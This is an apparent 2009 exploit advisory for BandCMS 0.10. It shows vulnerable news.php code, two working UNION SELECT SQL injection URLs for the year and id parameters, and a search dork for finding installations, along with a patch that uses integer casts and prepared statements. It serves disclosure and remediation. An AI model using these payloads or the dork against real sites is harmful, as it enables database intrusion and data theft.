
# Title : BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities
# Published : 2009-08-31
# Author : Affix


#################################################################
#	 _______ _________ _       				#
#       (  ____ )__   __/( (    /|				#
#	| (    )|   ) (   |    ( |				#
#	| (____)|   | |   |    | |				#
#	|     __)   | |   | ( ) |				#
#	| ( (      | |   | |    |				#
#	| )  __   | |   | )    |				#
#	|/   __/   )_(   |/    )_)				#
#       	http://root-the.net 				#
#################################################################
#[+] BandCMS v0.10 news.php Multiple SQL Injection Vulnerabilities	#
#[+] Vendor : http://rockband.sourceforge.net/			#
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Dork : "Powered by Rock Band CMS 0.10"			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      	  str0ke, tekto, raT, uNkn0wn.ws, ryan1918.com	#
#################################################################
#	BandCMS v0.10 has two SQL injections in news.php: the	#
#	year and id GET parameters are passed to the database	#
#	layer without any validation or type enforcement.	#
#								#
#	Code :							#
#	 if(isset($_GET['year'])){				#
#		$year = $_GET['year'];				#
#		$smarty->assign('news', $db->getNewsYear($year));
#	}							#
#								#
#								#
#	Exploit (MySQL needs whitespace after the -- comment	#
#	marker, so --+ is the safer form in a URL):		#
#	http://site.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--+
#								#
#								#
#	Code :							#
#	    $id = $_GET['id'];					#
#	    $newsItem = $db->getNewsItem($id);			#
#	    $smarty->assign('news', $newsItem);			#
#								#
#	Exploit (same note on the trailing -- as above):	#
#	http://site.com/news.php?id=-1+UNION+SELECT+1,2,3,4--+	#
#								#
#								#
#	Patch :							#
#	Both values land in a numeric SQL context, so quote	#
#	escaping does not stop these payloads: the injected	#
#	string contains no quotes at all. Wrapping		#
#	mysql_real_escape_string() in addslashes() is also	#
#	wrong on its own (it double-escapes every quote and	#
#	backslash). Enforce the expected type instead:		#
#								#
#	$year = (int) $_GET['year'];				#
#	$id   = (int) $_GET['id'];				#
#								#
#	Better still, use a prepared statement with bound	#
#	parameters inside getNewsYear() and getNewsItem() so	#
#	the fix does not depend on every caller casting.	#
#								#
#################################################################
